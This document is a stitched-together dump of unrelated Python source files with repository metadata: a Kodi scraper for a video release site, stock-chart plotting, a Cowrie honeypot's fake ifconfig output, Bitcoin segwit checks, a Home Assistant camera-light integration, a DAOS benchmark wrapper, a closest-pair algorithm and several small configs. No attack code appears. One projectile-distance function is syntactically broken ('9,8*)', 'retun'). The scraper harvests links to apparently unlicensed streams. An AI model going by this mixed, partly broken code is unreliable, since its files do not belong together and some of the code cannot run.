import re
import urlparse
import kodi
import log_utils # @UnusedImport
import dom_parser2
from salts_lib import scraper_utils
from salts_lib.constants import FORCE_NO_MATCH
from salts_lib.constants import VIDEO_TYPES
from salts_lib.utils2 import i18n
import scraper
BASE_URL = 'http://www.rlshd.net'
class Scraper(scraper.Scraper):
base_url = BASE_URL
def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
self.timeout = timeout
self.base_url = kodi.get_setting('%s-base_url' % (self.get_name()))
@classmethod
def provides(cls):
return frozenset([VIDEO_TYPES.EPISODE])
@classmethod
def get_name(cls):
return 'RLSHD'
def get_sources(self, video):
source_url = self.get_url(video)
hosters = []
if source_url and source_url != FORCE_NO_MATCH:
url = urlparse.urljoin(self.base_url, source_url)
html = self._http_get(url, require_debrid=True, cache_limit=.5)
sources = self.__get_post_links(html, video)
for source in sources:
if scraper_utils.excluded_link(source): continue
host = urlparse.urlparse(source).hostname
hoster = {'multi-part': False, 'host': host, 'class': self, 'views': None, 'url': source, 'rating': None, 'quality': sources[source], 'direct': False}
hosters.append(hoster)
return hosters
def __get_post_links(self, html, video):
sources = {}
post = dom_parser2.parse_dom(html, 'article', {'id': re.compile('post-\d+')})
if post:
for _attrs, fragment in dom_parser2.parse_dom(post[0].content, 'h2'):
for attrs, _content in dom_parser2.parse_dom(fragment, 'a', req='href'):
stream_url = attrs['href']
meta = scraper_utils.parse_episode_link(stream_url)
release_quality = scraper_utils.height_get_quality(meta['height'])
host = urlparse.urlparse(stream_url).hostname
quality = scraper_utils.get_quality(video, host, release_quality)
sources[stream_url] = quality
return sources
def get_url(self, video):
return self._blog_get_url(video)
@classmethod
def get_settings(cls):
settings = super(cls, cls).get_settings()
settings = scraper_utils.disable_sub_check(settings)
name = cls.get_name()
settings.append(' <setting id="%s-filter" type="slider" range="0,180" option="int" label=" %s" default="30" visible="eq(-3,true)"/>' % (name, i18n('filter_results_days')))
settings.append(' <setting id="%s-select" type="enum" label=" %s" lvalues="30636|30637" default="0" visible="eq(-4,true)"/>' % (name, i18n('auto_select')))
return settings
def search(self, video_type, title, year, season=''): # @UnusedVariable
html = self._http_get(self.base_url, params={'s': title}, require_debrid=True, cache_limit=1)
post_pattern = 'class="entry-title">\s*<a[^>]+href="(?P<url>[^"]*/(?P<date>\d{4}/\d{1,2}/\d{1,2})/[^"]*)[^>]+>(?P<post_title>[^<]+)'
date_format = '%Y/%m/%d'
return self._blog_proc_results(html, post_pattern, date_format, video_type, title, year)
| [
"tdbaddon@hotmail.com"
] | tdbaddon@hotmail.com |
167a1a0bf78a1e1379f4295b09cbfeedf34b7840 | dbd87fe6e9466c4cada18b037667cfdddc62c193 | /Technical_Indicators/ZigZag.py | 057435288496ca0943ce0fe371e39f8bf6a7d9ca | [] | no_license | alexanu/Python_Trading_Snippets | 74515a40dc63ba50d95bd50330ed05d59b5dc837 | 85969e681b9c74e24e60cc524a952f9585ea9ce9 | refs/heads/main | 2023-06-25T03:27:45.813987 | 2023-06-09T16:09:43 | 2023-06-09T16:09:43 | 197,401,560 | 18 | 17 | null | 2023-02-08T22:25:25 | 2019-07-17T14:05:32 | Jupyter Notebook | UTF-8 | Python | false | false | 1,826 | py | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings("ignore")
import yfinance as yf
yf.pdr_override()
import datetime as dt
# input
symbol = 'AAPL'
start = dt.date.today() - dt.timedelta(days = 365)
end = dt.date.today()
# Read data
df = yf.download(symbol,start,end)
from zigzag import *
plt.figure(figsize=(14,7))
pivots = peak_valley_pivots(df['Adj Close'].values, 0.2, -0.2)
ts_pivots = pd.Series(df['Adj Close'], index=df.index)
ts_pivots = ts_pivots[pivots != 0]
df['Adj Close'].plot()
ts_pivots.plot(style='g-o', label='ZigZag')
plt.title('Stock of ZigZag', fontsize=18)
plt.legend(loc='best')
plt.xlabel('Date')
plt.ylabel('Price')
plt.show()
# ## Candlestick with ZigZag
from matplotlib import dates as mdates
dfc = df.copy()
dfc['VolumePositive'] = dfc['Open'] < dfc['Adj Close']
#dfc = dfc.dropna()
dfc = dfc.reset_index()
dfc['Date'] = mdates.date2num(dfc['Date'].tolist())
from mplfinance.original_flavor import candlestick_ohlc
fig = plt.figure(figsize=(14,7))
ax1 = plt.subplot(111)
candlestick_ohlc(ax1,dfc.values, width=0.5, colorup='g', colordown='r', alpha=1.0)
pivots = peak_valley_pivots(df['Adj Close'].values, 0.2, -0.2)
ts_pivots = pd.Series(df['Adj Close'], index=df.index)
ts_pivots = ts_pivots[pivots != 0]
ax1.plot(df['Adj Close'])
ts_pivots.plot(style='g-o', label='ZigZag')
ax1.xaxis_date()
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%d-%m-%Y'))
ax1.grid(True, which='both')
ax1.minorticks_on()
ax1v = ax1.twinx()
colors = dfc.VolumePositive.map({True: 'g', False: 'r'})
ax1v.bar(dfc.Date, dfc['Volume'], color=colors, alpha=0.4)
ax1v.axes.yaxis.set_ticklabels([])
ax1v.set_ylim(0, 3*df.Volume.max())
ax1.set_title('Stock '+ symbol +' Closing Price')
ax1.set_ylabel('Price')
ax1.set_xlabel('Date')
ax1.legend()
plt.show() | [
"oanufriyev@gmail.com"
] | oanufriyev@gmail.com |
8d827c60eec9c54f9403584d65216617936c6c77 | a190ccac9d0ed3e0de44648957bf616c2dd88466 | /cowrie/commands/ifconfig.py | acf38c5576a8b3e6e453f1d5ebd2d6684d7332e8 | [
"BSD-2-Clause"
] | permissive | CrazyLlama/cowrie | bd0d400c22017348a7aa450841f5fb094d293a47 | 5bdf4093a34be4ede7778a171d0a84a889060c6b | refs/heads/master | 2021-01-12T11:11:29.510918 | 2018-05-01T14:55:04 | 2018-05-01T14:55:04 | 72,859,411 | 1 | 0 | null | 2018-05-01T14:55:05 | 2016-11-04T15:19:29 | Python | UTF-8 | Python | false | false | 1,395 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2014 Peter Reuterås <peter@reuteras.com>
# See the COPYRIGHT file for more information
from __future__ import division, absolute_import
from cowrie.shell.honeypot import HoneyPotCommand
commands = {}
class command_ifconfig(HoneyPotCommand):
def call(self):
l = """eth0 Link encap:Ethernet HWaddr 04:01:16:df:2d:01
inet addr:%s Bcast:%s.255 Mask:255.255.255.0
inet6 addr: fe80::601:16ff:fedf:2d01/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:139435762 errors:0 dropped:0 overruns:0 frame:0
TX packets:116082382 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:102191499830 (102.1 GB) TX bytes:68687923025 (68.6 GB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:110 errors:0 dropped:0 overruns:0 frame:0
TX packets:110 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:19932 (19.9 KB) TX bytes:19932 (19.9 KB)""" % \
(self.protocol.kippoIP,
self.protocol.kippoIP.rsplit('.', 1)[0])
self.write(l+'\n')
commands['/sbin/ifconfig'] = command_ifconfig
# vim: set sw=4 et:
| [
"michel@oosterhof.net"
] | michel@oosterhof.net |
88c9be39ef89d55c1845d93bf1e0875f8696b53b | 11aa417a375023da34224b9cb8c46f75c8753f6f | /aiobitcoin/tools/tx/script/segwit.py | 282f53ae10a5eec4de3a0a7dc8a5d87769d76174 | [
"MIT"
] | permissive | mkbeh/aiobitcoin | 426a1be16c9b7d7150a164fff553296988961625 | 1cc9121a292208600b1631a709917c82a1238964 | refs/heads/master | 2023-08-07T15:11:41.892153 | 2021-07-11T11:05:29 | 2021-07-11T11:05:29 | 185,234,495 | 1 | 2 | MIT | 2023-07-20T15:09:24 | 2019-05-06T16:36:30 | Python | UTF-8 | Python | false | false | 5,230 | py | # -*- coding: utf-8 -*-
"""
Parse, stream, create, sign and verify Bitcoin transactions as Tx structures.
The MIT License (MIT)
Copyright (c) 2017 by Richard Kiss
Copyright (c) 2019 July by mkbeh
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from hashlib import sha256
from ...intbytes import byte2int, indexbytes
from .flags import (
VERIFY_P2SH, VERIFY_DISCOURAGE_UPGRADABLE_WITNESS_PROGRAM
)
from . import errno
from . import opcodes
from . import ScriptError
from .Stack import Stack
from .eval_script import eval_script
from .tools import bin_script, bool_from_script_bytes
def witness_program_version(script):
l = len(script)
if l < 4 or l > 42:
return None
first_opcode = byte2int(script)
if indexbytes(script, 1) + 2 != l:
return None
if first_opcode == opcodes.OP_0:
return 0
if opcodes.OP_1 <= first_opcode <= opcodes.OP_16:
return first_opcode - opcodes.OP_1 + 1
return None
def check_witness_program_v0(
witness, script_signature, flags, signature_for_hash_type_f,
lock_time, expected_hash_type, traceback_f, tx_sequence, tx_version):
l = len(script_signature)
if l == 32:
if len(witness) == 0:
raise ScriptError("witness program empty", errno.WITNESS_PROGRAM_WITNESS_EMPTY)
script_public_key = witness[-1]
if sha256(script_public_key).digest() != script_signature:
raise ScriptError("witness program mismatch", errno.WITNESS_PROGRAM_MISMATCH)
stack = Stack(witness[:-1])
elif l == 20:
# special case for pay-to-pubkeyhash; signature + pubkey in witness
if len(witness) != 2:
raise ScriptError("witness program mismatch", errno.WITNESS_PROGRAM_MISMATCH)
# "OP_DUP OP_HASH160 %s OP_EQUALVERIFY OP_CHECKSIG" % b2h(script_signature))
script_public_key = b'v\xa9' + bin_script([script_signature]) + b'\x88\xac'
stack = Stack(witness)
else:
raise ScriptError("witness program wrong length", errno.WITNESS_PROGRAM_WRONG_LENGTH)
return stack, script_public_key
def check_witness_program(
witness, version, script_signature, flags, signature_for_hash_type_f,
lock_time, expected_hash_type, traceback_f, tx_sequence, tx_version):
if version == 0:
stack, script_public_key = check_witness_program_v0(
witness, script_signature, flags, signature_for_hash_type_f,
lock_time, expected_hash_type, traceback_f, tx_sequence, tx_version)
elif flags & VERIFY_DISCOURAGE_UPGRADABLE_WITNESS_PROGRAM:
raise ScriptError(
"this version witness program not yet supported", errno.DISCOURAGE_UPGRADABLE_WITNESS_PROGRAM)
else:
return
for s in stack:
if len(s) > 520:
raise ScriptError("pushing too much data onto stack", errno.PUSH_SIZE)
eval_script(script_public_key, signature_for_hash_type_f.witness, lock_time, expected_hash_type,
stack, traceback_f=traceback_f, flags=flags, is_signature=True,
tx_sequence=tx_sequence, tx_version=tx_version)
if len(stack) == 0 or not bool_from_script_bytes(stack[-1]):
raise ScriptError("eval false", errno.EVAL_FALSE)
if len(stack) != 1:
raise ScriptError("stack not clean after evaluation", errno.CLEANSTACK)
def check_witness(stack, script_public_key, script_signature, witness, witness_flags, signature_for_hash_type_f,
lock_time, expected_hash_type, traceback_f, tx_sequence, tx_version):
witness_version = witness_program_version(script_public_key)
had_witness = False
if witness_version is not None:
had_witness = True
witness_program = script_public_key[2:]
if len(script_signature) > 0:
err = errno.WITNESS_MALLEATED if witness_flags & VERIFY_P2SH else errno.WITNESS_MALLEATED_P2SH
raise ScriptError("script sig is not blank on segwit input", err)
check_witness_program(
witness, witness_version, witness_program, witness_flags,
signature_for_hash_type_f, lock_time, expected_hash_type,
traceback_f, tx_sequence, tx_version)
stack[:] = stack[-1:]
return had_witness
| [
"mkbehforever@gmail.com"
] | mkbehforever@gmail.com |
8417118ad2daf826e674008968ff8e3a4da089ce | 5d65f00e3fb6c84779f14ec0be852f1da285aec2 | /homeassistant/components/netatmo/light.py | 6fe5e84e65af8351faa316f63b4a175b99cb531c | [
"Apache-2.0"
] | permissive | Shahzad6077/core | b448ff00ef4fed131c70c0671635b7b4c62dd23d | e0873493e2f77e9702601969712f6d2c1536aaef | refs/heads/master | 2023-07-09T18:11:20.778850 | 2021-08-16T03:49:10 | 2021-08-16T03:49:10 | 397,514,065 | 2 | 0 | Apache-2.0 | 2021-08-18T07:36:53 | 2021-08-18T07:36:53 | null | UTF-8 | Python | false | false | 5,010 | py | """Support for the Netatmo camera lights."""
from __future__ import annotations
import logging
from typing import cast
import pyatmo
from homeassistant.components.light import LightEntity
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant, callback
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import (
DATA_HANDLER,
DOMAIN,
EVENT_TYPE_LIGHT_MODE,
MANUFACTURER,
SIGNAL_NAME,
WEBHOOK_LIGHT_MODE,
WEBHOOK_PUSH_TYPE,
)
from .data_handler import CAMERA_DATA_CLASS_NAME, NetatmoDataHandler
from .netatmo_entity_base import NetatmoBase
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up the Netatmo camera light platform."""
if "access_camera" not in entry.data["token"]["scope"]:
_LOGGER.info(
"Cameras are currently not supported with this authentication method"
)
return
data_handler = hass.data[DOMAIN][entry.entry_id][DATA_HANDLER]
await data_handler.register_data_class(
CAMERA_DATA_CLASS_NAME, CAMERA_DATA_CLASS_NAME, None
)
data_class = data_handler.data.get(CAMERA_DATA_CLASS_NAME)
if not data_class or data_class.raw_data == {}:
raise PlatformNotReady
all_cameras = []
for home in data_handler.data[CAMERA_DATA_CLASS_NAME].cameras.values():
for camera in home.values():
all_cameras.append(camera)
entities = [
NetatmoLight(
data_handler,
camera["id"],
camera["type"],
camera["home_id"],
)
for camera in all_cameras
if camera["type"] == "NOC"
]
_LOGGER.debug("Adding camera lights %s", entities)
async_add_entities(entities, True)
class NetatmoLight(NetatmoBase, LightEntity):
"""Representation of a Netatmo Presence camera light."""
def __init__(
self,
data_handler: NetatmoDataHandler,
camera_id: str,
camera_type: str,
home_id: str,
) -> None:
"""Initialize a Netatmo Presence camera light."""
LightEntity.__init__(self)
super().__init__(data_handler)
self._data_classes.append(
{"name": CAMERA_DATA_CLASS_NAME, SIGNAL_NAME: CAMERA_DATA_CLASS_NAME}
)
self._id = camera_id
self._home_id = home_id
self._model = camera_type
self._device_name: str = self._data.get_camera(camera_id)["name"]
self._attr_name = f"{MANUFACTURER} {self._device_name}"
self._is_on = False
self._attr_unique_id = f"{self._id}-light"
async def async_added_to_hass(self) -> None:
"""Entity created."""
await super().async_added_to_hass()
self._listeners.append(
async_dispatcher_connect(
self.hass,
f"signal-{DOMAIN}-webhook-{EVENT_TYPE_LIGHT_MODE}",
self.handle_event,
)
)
@callback
def handle_event(self, event: dict) -> None:
"""Handle webhook events."""
data = event["data"]
if not data.get("camera_id"):
return
if (
data["home_id"] == self._home_id
and data["camera_id"] == self._id
and data[WEBHOOK_PUSH_TYPE] == WEBHOOK_LIGHT_MODE
):
self._is_on = bool(data["sub_type"] == "on")
self.async_write_ha_state()
return
@property
def _data(self) -> pyatmo.AsyncCameraData:
"""Return data for this entity."""
return cast(
pyatmo.AsyncCameraData,
self.data_handler.data[self._data_classes[0]["name"]],
)
@property
def available(self) -> bool:
"""If the webhook is not established, mark as unavailable."""
return bool(self.data_handler.webhook)
@property
def is_on(self) -> bool:
"""Return true if light is on."""
return self._is_on
async def async_turn_on(self, **kwargs: dict) -> None:
"""Turn camera floodlight on."""
_LOGGER.debug("Turn camera '%s' on", self.name)
await self._data.async_set_state(
home_id=self._home_id,
camera_id=self._id,
floodlight="on",
)
async def async_turn_off(self, **kwargs: dict) -> None:
"""Turn camera floodlight into auto mode."""
_LOGGER.debug("Turn camera '%s' to auto mode", self.name)
await self._data.async_set_state(
home_id=self._home_id,
camera_id=self._id,
floodlight="auto",
)
@callback
def async_update_callback(self) -> None:
"""Update the entity's state."""
self._is_on = bool(self._data.get_light_state(self._id) == "on")
| [
"noreply@github.com"
] | Shahzad6077.noreply@github.com |
9d8946b7ca19fe0c6393b5f6a2dde7d406919cd9 | 78f3fe4a148c86ce9b80411a3433a49ccfdc02dd | /2015/09/college-scorecard-laitinen-20150916/graphic_config.py | beb761cd07fa41c1aada464419435120c5b3c263 | [] | no_license | nprapps/graphics-archive | 54cfc4d4d670aca4d71839d70f23a8bf645c692f | fe92cd061730496cb95c9df8fa624505c3b291f8 | refs/heads/master | 2023-03-04T11:35:36.413216 | 2023-02-26T23:26:48 | 2023-02-26T23:26:48 | 22,472,848 | 16 | 7 | null | null | null | null | UTF-8 | Python | false | false | 1,049 | py | #!/usr/bin/env python
import base_filters
from math import trunc
COPY_GOOGLE_DOC_KEY = '1AOxvgIztKDd-GOVZjx11dRjmRadr47wXUsDUMS2awJw'
USE_ASSETS = False
# Use these variables to override the default cache timeouts for this graphic
# DEFAULT_MAX_AGE = 20
# ASSETS_MAX_AGE = 300
def breaks(n):
n = float(n)
if (n >= 200):
return 'plus200'
elif (n >= 150):
return 'plus150'
elif (n >= 100):
return 'plus100'
elif (n >= 50):
return 'plus50'
else:
return 'plus0'
def format_currency(value):
return "{:,.1f}".format(float(value)/1000) + "k"
def format_score(value):
return "{:.2f}".format(float(value))
def format_rank(value):
floated = trunc(float(value))
return floated
def format_percent(value):
return "{0:.00f}".format(float(value)*100)
def format_percent2(value):
return "{0:.1f}".format(float(value)*100)
JINJA_FILTER_FUNCTIONS = base_filters.FILTERS + [format_currency] + [format_rank] + [format_percent] + [format_score] + [format_percent2]
| [
"ahurt@npr.org"
] | ahurt@npr.org |
2630419c2c16f7fafecd89941409cee861476904 | 1efd2de8bf77ec00eb2fcaf5749278495946d920 | /src/tests/ftest/util/dbench_utils.py | 897f77efe1395dadb573a482c8594d04f951011e | [
"BSD-2-Clause",
"BSD-2-Clause-Patent"
] | permissive | daos-stack/daos | 6f55bf3061fd830d5b8d28506e1295e2d3a27c38 | ed5eed5df43a68571afe123132a743824c02637a | refs/heads/master | 2023-08-31T21:43:37.606145 | 2023-08-31T16:38:00 | 2023-08-31T16:38:00 | 69,390,670 | 631 | 300 | NOASSERTION | 2023-09-14T18:55:15 | 2016-09-27T19:21:29 | C | UTF-8 | Python | false | false | 2,879 | py | """
(C) Copyright 2019-2023 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
from command_utils_base import FormattedParameter
from command_utils_base import BasicParameter
from command_utils import ExecutableCommand
from job_manager_utils import Mpirun
# pylint: disable=too-few-public-methods,too-many-instance-attributes
class DbenchCommand(ExecutableCommand):
"""Defines a object representing a dbench command."""
def __init__(self, namespace, command):
"""Create a dbench Command object."""
super().__init__(namespace, command)
# dbench options
self.timelimit = FormattedParameter("--timelimit {}")
self.loadfile = FormattedParameter("--loadfile {}")
self.directory = FormattedParameter("--directory {}")
self.tcp_options = FormattedParameter("--tcp-options {}")
self.target_rate = FormattedParameter("--target-rate {}")
self.sync = FormattedParameter("--sync", False)
self.fsync = FormattedParameter("--fsync", False)
self.xattr = FormattedParameter("--xattr", False)
self.no_resolve = FormattedParameter("--no-resolve", False)
self.clients_per_process = FormattedParameter(
"--clients-per-process {}")
self.one_byte_write_fix = FormattedParameter(
"--one-byte-write-fix", False)
self.stat_check = FormattedParameter("--stat-check", False)
self.fake_io = FormattedParameter("--fake-io", False)
self.skip_cleanup = FormattedParameter("--skip-cleanup", False)
self.per_client_results = FormattedParameter(
"--per-client-results", False)
self.num_of_procs = BasicParameter(None)
def get_param_names(self):
"""Overriding the original get_param_names."""
param_names = super().get_param_names()
# move key=num_of_procs to the end
param_names.sort(key='num_of_procs'.__eq__)
return param_names
class Dbench(DbenchCommand):
"""Class defining an object of type DbenchCommand."""
def __init__(self, hosts, tmp):
"""Create a dbench object."""
super().__init__("/run/dbench/*", "dbench")
# set params
self.hosts = hosts
self.tmp = tmp
def run(self, processes=1):
# pylint: disable=arguments-differ
# pylint: disable=arguments-renamed
"""Run the dbench command.
Args:
processes: mpi processes
Raises:
CommandFailure: In case dbench run command fails
"""
self.log.info('Starting dbench')
# Get job manager cmd
mpirun = Mpirun(self, mpi_type="mpich")
mpirun.assign_hosts(self.hosts, self.tmp)
mpirun.assign_processes(processes)
mpirun.exit_status_exception = True
# run dbench
out = mpirun.run()
return out
| [
"noreply@github.com"
] | daos-stack.noreply@github.com |
9893f64592146bbf9aa0045526733414bc2fe78e | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_217/ch19_2019_03_26_19_01_39_954573.py | eb141b3e1ed996df46b165c1f995431f0b7a5452 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | import math
def calcula_distancia_do_projetil(v,an,yo):
d= (v**2)/(2*9,8*)(1+(1+(2*9,8*yo)/(v**2)*((sin(an))**2))*sin(2*an)
retun d | [
"you@example.com"
] | you@example.com |
9ca6261bf93b240faa6581bb150d113d8fdacb75 | dbe5973d69df9c5a5f3b06b7451a0de7086ebda4 | /myapps/catalogue/migrations/0016_remove_product_price.py | 42b33265e0b7f36f5617d40c3801e771e1b10d5d | [] | no_license | phares/mall | 29e7c0fdf3222a05161de36c8252167ab59df7be | d3f0093828c892ce46d55afaa245e5780555cc68 | refs/heads/master | 2021-01-22T23:53:27.535609 | 2017-04-30T09:17:53 | 2017-04-30T09:17:53 | 85,676,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 390 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-04-13 08:45
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('catalogue', '0015_product_price'),
]
operations = [
migrations.RemoveField(
model_name='product',
name='price',
),
]
| [
"cndeti@gmail.com"
] | cndeti@gmail.com |
7dcae7d80631e98f00eb1837adc3c9fa7474450c | e01c5d1ee81cc4104b248be375e93ae29c4b3572 | /Sequence4/Algorithm-toolbox/Week4/submission/closestpoint-6-2.py | 27df5061138128feac6d7ae6f4c0b8f7ec3a3d67 | [] | no_license | lalitzz/DS | 7de54281a34814601f26ee826c722d123ee8bd99 | 66272a7a8c20c0c3e85aa5f9d19f29e0a3e11db1 | refs/heads/master | 2021-10-14T09:47:08.754570 | 2018-12-29T11:00:25 | 2018-12-29T11:00:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,406 | py | #Uses python3
import sys
from math import sqrt
def closest_util(Px, Py, ln):
if ln <= 3:
return brute_force(Px, ln)
mid = ln // 2
Qx = Px[:mid]
Rx = Px[mid:]
mid_point = Px[mid][0]
Qy = []
Ry = []
for x in Py:
if x[0] <= mid_point:
Qy.append(x)
else:
Ry.append(x)
mid1 = closest_util(Qx, Qy, mid)
mid2 = closest_util(Rx, Ry, ln - mid)
d = min(mid1, mid2)
strip = []
for i in range(len(Py)):
if abs(Py[i][0] - mid_point) < d:
strip.append(Py[i])
return min(d, strip_closest(strip, len(strip), d))
def brute_force(Px, ln):
mi = float('inf')
for i in range(ln):
for j in range(i+1, ln):
d = dist(Px[i], Px[j])
if d < mi:
mi = d
return mi
def dist(p1, p2):
return sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)
def strip_closest(strip, size, delta):
_min = delta
for i in range(size):
for j in range(i+1, min(i + 5, size)):
dst = dist(strip[i], strip[j])
if dst < _min:
_min = dst
return _min
def closest(P, n):
Px = sorted(P, key= lambda d: d[0])
Py = sorted(P, key= lambda d: d[1])
mi = closest_util(Px, Py, n)
return mi
if __name__ == '__main__':
input = sys.stdin.read()
data = list(map(int, input.split()))
n = data[0]
a = []
i = 1
a = list(zip(data[1::2], data[2::2]))
p = closest(a, n)
print("{0:.9f}".format(p)) | [
"lalit.slg007@gmail.com"
] | lalit.slg007@gmail.com |
fb493a7f9431ddc6e4e4707347757a429979cb9f | 6e0001fb880d83d1d3e305e42acba93b85631838 | /Point Diagrams/PD1V1/out1/v_EQEQLTprojectGT.py | 4e6410b1e9e99b3fdac62c13dafc2d7f714accb5 | [] | no_license | pjalagna/Aryc2019 | 97b6de8248006bf19af527e4c1e35763b1277aaa | ece8ccf18305e6c65a59bee650b47b8730904bd0 | refs/heads/master | 2021-06-21T23:14:55.527195 | 2021-03-18T08:02:31 | 2021-03-18T08:02:31 | 205,817,944 | 0 | 1 | null | 2020-10-16T00:13:31 | 2019-09-02T09:03:22 | Python | UTF-8 | Python | false | false | 594 | py |
# file v_EQEQLTprojectGT.py
def main(objj,trace):
local = {} # local architecture ; dies with action
local['ds'] = []
local['nds'] = {}
if(trace == 1):
xx = raw_input("begin v_EQEQLTprojectGT")
retbox = [0,objj,trace] # init by type
# set status to retbox[0] = 0 ok -1 ng or #
retbox[0] = 0 # default is ok
# process work goes here
t = objj['ds'].pop()
if (t == "<project>"):
retbox[0] = 0 # ok
else:
objj['ds'].push(t)
retbox[0] = -1
#endif
return(retbox)
#end v_EQEQLTprojectGT
| [
"PJAlagna@Gmail.com"
] | PJAlagna@Gmail.com |
efe564a24df6338dc3c130002c9e6e40ce2caf64 | 971e0efcc68b8f7cfb1040c38008426f7bcf9d2e | /tests/model_control/detailed/transf_Anscombe/model_control_one_enabled_Anscombe_Lag1Trend_Seasonal_DayOfMonth_AR.py | 1f63aee2753363e8e382e17a46c09ec522a83da8 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | antoinecarme/pyaf | a105d172c2e7544f8d580d75f28b751351dd83b6 | b12db77cb3fa9292e774b2b33db8ce732647c35e | refs/heads/master | 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 | BSD-3-Clause | 2023-03-08T21:45:40 | 2016-10-13T09:30:30 | Python | UTF-8 | Python | false | false | 160 | py | import tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Anscombe'] , ['Lag1Trend'] , ['Seasonal_DayOfMonth'] , ['AR'] ); | [
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
24840e6649ffe2f0b8e59a92f4cc0b9bfca31034 | c94f888541c0c430331110818ed7f3d6b27b788a | /shuziwuliu/python/setup.py | e31004b6c7feda1ea8f494f74cff8d9f5bb07c6e | [
"Apache-2.0",
"MIT"
] | permissive | alipay/antchain-openapi-prod-sdk | 48534eb78878bd708a0c05f2fe280ba9c41d09ad | 5269b1f55f1fc19cf0584dc3ceea821d3f8f8632 | refs/heads/master | 2023-09-03T07:12:04.166131 | 2023-09-01T08:56:15 | 2023-09-01T08:56:15 | 275,521,177 | 9 | 10 | MIT | 2021-03-25T02:35:20 | 2020-06-28T06:22:14 | PHP | UTF-8 | Python | false | false | 2,523 | py | # -*- coding: utf-8 -*-
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
import os
from setuptools import setup, find_packages
"""
setup module for antchain_shuziwuliu.
Created on 21/03/2023
@author: Ant Chain SDK
"""
PACKAGE = "antchain_sdk_shuziwuliu"
NAME = "antchain_shuziwuliu" or "alibabacloud-package"
DESCRIPTION = "Ant Chain SHUZIWULIU SDK Library for Python"
AUTHOR = "Ant Chain SDK"
AUTHOR_EMAIL = "sdk-team@alibabacloud.com"
URL = "https://github.com/alipay/antchain-openapi-prod-sdk"
VERSION = __import__(PACKAGE).__version__
REQUIRES = [
"antchain_alipay_util>=1.0.1, <2.0.0",
"alibabacloud_tea_util>=0.3.8, <1.0.0",
"alibabacloud_rpc_util>=0.0.4, <1.0.0"
]
LONG_DESCRIPTION = ''
if os.path.exists('./README.md'):
with open("README.md", encoding='utf-8') as fp:
LONG_DESCRIPTION = fp.read()
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=AUTHOR_EMAIL,
license="Apache License 2.0",
url=URL,
keywords=["antchain","shuziwuliu"],
packages=find_packages(exclude=["tests*"]),
include_package_data=True,
platforms="any",
install_requires=REQUIRES,
python_requires=">=3.6",
classifiers=(
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
"Topic :: Software Development"
)
)
| [
"sdk-team@alibabacloud.com"
